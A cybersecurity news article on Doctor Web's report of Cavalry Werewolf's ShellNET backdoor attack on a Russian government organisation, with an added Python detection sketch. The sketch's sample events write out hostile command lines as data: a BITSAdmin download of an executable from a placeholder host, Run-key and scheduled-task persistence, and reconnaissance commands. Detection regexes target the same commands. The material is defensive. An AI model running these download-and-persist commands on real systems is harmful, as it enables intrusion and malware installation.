Cavalry Werewolf Hit Russian Government with New ShellNET Backdoor
Doctor Web uncovers a targeted cyberattack on a Russian government body by the Cavalry Werewolf group using a new ShellNET backdoor and Telegram-based control.
Cybersecurity researchers at Doctor Web have discovered a targeted attack against a Russian government-owned organisation carried out by a hacker group known as Cavalry Werewolf.
The operation, which surfaced in July 2025, began after the organisation noticed spam emails being sent from its own corporate address, a red flag that led to an in-depth internal investigation.
Doctor Web’s researchers linked the incident to a phishing campaign that used password-protected archives posing as legitimate documents. Analysis of those files revealed an unknown new backdoor, now tracked as BackDoor.ShellNET.1.
The phishing email used in the campaign. The Russian-language screenshot was shared by Doctor Web, while the English version was translated by Hackread.com using AI.
The backdoor, as per Doctor Web’s technical report, is based on open-source Reverse-Shell-CS code. Once executed, the malware opened a reverse shell connection, allowing attackers to run commands remotely and deploy further tools.
Researchers further noted that the attackers used Windows’ built-in BITSAdmin utility to download additional payloads, including the Trojan.FileSpyNET.5 infostealer. That tool collected documents, spreadsheets, text files, and images from infected systems before uploading them to an external server. Another component, BackDoor.Tunnel.41, created a SOCKS5 tunnel for covert communication and remote control.
During the analysis, Doctor Web’s researchers also found that Cavalry Werewolf relies on open-source frameworks and custom backdoors written in C#, C++, and Golang. These tools were used for remote command execution, proxy tunnelling, stealing data, and persistence through Windows registry edits and scheduled tasks.
Many of the implants were controlled via Telegram bots, an increasingly common method for managing infected hosts while masking the attacker’s infrastructure. Doctor Web also detected trojanized versions of popular utilities like WinRAR, 7-Zip, and Visual Studio Code, which were used to launch secondary malware when opened.
Cavalry Werewolf operators gathered system and user information using standard Windows commands such as whoami, ipconfig /all, and net user. They also inspected local files and network settings to plan the next stage of their attack. The researchers believe the hackers’ goal was to collect confidential information and internal network configurations.
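The behaviours the report describes (a BITSAdmin download of a secondary payload, a burst of whoami / ipconfig / net user reconnaissance from one parent process, persistence through a Run registry key or scheduled task, and a non-browser process talking to Telegram's bot API) are all visible in ordinary endpoint telemetry. The detection sketch below is an added example written for this article, not code from Doctor Web or Hackread.com; it runs over constructed process-creation and network events of the kind Sysmon Event ID 1 / Security 4688 and Sysmon Event ID 3 would produce. All hostnames, file paths and task names in the sample data are placeholders.

```python
"""Detection sketch for the tradecraft described in the article (added example).

Scans constructed Windows endpoint events for four behaviours the report names:
  * BITSAdmin used to fetch a payload over HTTP(S)
  * several distinct reconnaissance commands spawned by one parent in a short window
  * persistence via a CurrentVersion\\Run key or a new scheduled task
  * a non-browser process contacting api.telegram.org (bot-based C2)
Hostnames, paths and task names below are placeholders, not indicators from the report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: int          # seconds since an arbitrary epoch (constructed)
    host: str
    parent: str      # parent image name
    image: str       # process image name
    cmdline: str


@dataclass
class NetEvent:
    ts: int
    host: str
    image: str
    dest_host: str


# Constructed sample telemetry: one compromised workstation (ws01) and one
# workstation with benign admin activity (ws02).
PROC_EVENTS = [
    ProcEvent(100, "ws01", "winword.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(101, "ws01", "winword.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
    ProcEvent(102, "ws01", "winword.exe", "cmd.exe", "cmd.exe /c net user"),
    ProcEvent(130, "ws01", "cmd.exe", "bitsadmin.exe",
              "bitsadmin.exe /transfer job1 http://placeholder.invalid/p.exe C:\\Users\\Public\\p.exe"),
    ProcEvent(140, "ws01", "cmd.exe", "reg.exe",
              "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
              "/v upd /t REG_SZ /d C:\\Users\\Public\\p.exe"),
    ProcEvent(141, "ws01", "cmd.exe", "schtasks.exe",
              "schtasks.exe /create /tn upd /tr C:\\Users\\Public\\p.exe /sc onlogon"),
    ProcEvent(500, "ws02", "explorer.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
]
NET_EVENTS = [
    NetEvent(150, "ws01", "p.exe", "api.telegram.org"),
    NetEvent(600, "ws02", "chrome.exe", "api.telegram.org"),
]

RECON_CMDS = ("whoami", "ipconfig", "net user", "systeminfo", "net group", "nltest")
BITS_DOWNLOAD = re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://", re.I)
RUNKEY = re.compile(r"reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)
SCHTASK = re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}


def detect_bits_download(events):
    """BITSAdmin transfer jobs pulling from a remote URL."""
    return [e for e in events if BITS_DOWNLOAD.search(e.cmdline)]


def detect_persistence(events):
    """Run-key additions and scheduled-task creation from the command line."""
    return [e for e in events if RUNKEY.search(e.cmdline) or SCHTASK.search(e.cmdline)]


def detect_recon_burst(events, window=60, threshold=3):
    """(host, parent) pairs that spawn >= threshold distinct recon commands within `window` seconds."""
    by_key = defaultdict(list)
    for e in events:
        cmd = e.cmdline.lower()
        for r in RECON_CMDS:
            if r in cmd:
                by_key[(e.host, e.parent)].append((e.ts, r))
                break
    hits = []
    for (host, parent), seen in by_key.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            distinct = {r for t, r in seen[i:] if t - t0 <= window}
            if len(distinct) >= threshold:
                hits.append((host, parent, sorted(distinct)))
                break
    return hits


def detect_telegram_c2(events):
    """Telegram API traffic from anything that is not a browser or the Telegram client."""
    return [e for e in events
            if e.dest_host.lower().endswith("telegram.org") and e.image.lower() not in BROWSERS]


if __name__ == "__main__":
    print("BITS downloads:", [e.ts for e in detect_bits_download(PROC_EVENTS)])
    print("Persistence:", [e.ts for e in detect_persistence(PROC_EVENTS)])
    print("Recon bursts:", detect_recon_burst(PROC_EVENTS))
    print("Telegram C2:", [e.ts for e in detect_telegram_c2(NET_EVENTS)])
```

The single ipconfig on ws02 stays below the burst threshold and the browser's Telegram connection is whitelisted, so only the ws01 chain fires; in a real deployment the parent-process filter (an Office or archiver process spawning cmd.exe) is what separates this from routine administration.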
**Who is Cavalry Werewolf**
Cavalry Werewolf first drew attention when cybersecurity firms observed a campaign from May to August 2025 targeting Russian state agencies and large industrial firms in energy, mining and manufacturing. The group used spear-phishing emails impersonating Kyrgyz government officials, which opened the door to malware deployment and remote access.
In its past operations, the group deployed custom backdoors and proxy tools, for example “FoalShell” and “StallionRAT,” with remote execution and data theft capabilities. Analysts also note overlaps in tools and infrastructure with other clusters such as Silent Lynx and YoroTrooper, which suggests Cavalry Werewolf may be built on earlier actor foundations or cooperating with them.
**Look Before You Leap… or Weep**
Although the origins of the Cavalry Werewolf hackers remain unknown, Doctor Web’s report concludes that the group keeps adding new tools to its toolkit, reusing old code and tweaking its malware for every new attack.
The trojanized versions of well-known programs such as WinRAR, 7-Zip, and Visual Studio Code are another disaster waiting to happen if the group shifts its focus from government networks to regular users. A single careless download could be enough to hand over full control of a system.
That’s why you should never download software from third-party websites, no matter how convincing their reviews may sound. Avoid installing games, mods, or utilities from unverified sources just for convenience. Always use official platforms, and even then, run new files through VirusTotal and your antivirus before installing.
The point isn’t to scare you, it’s to keep you secure.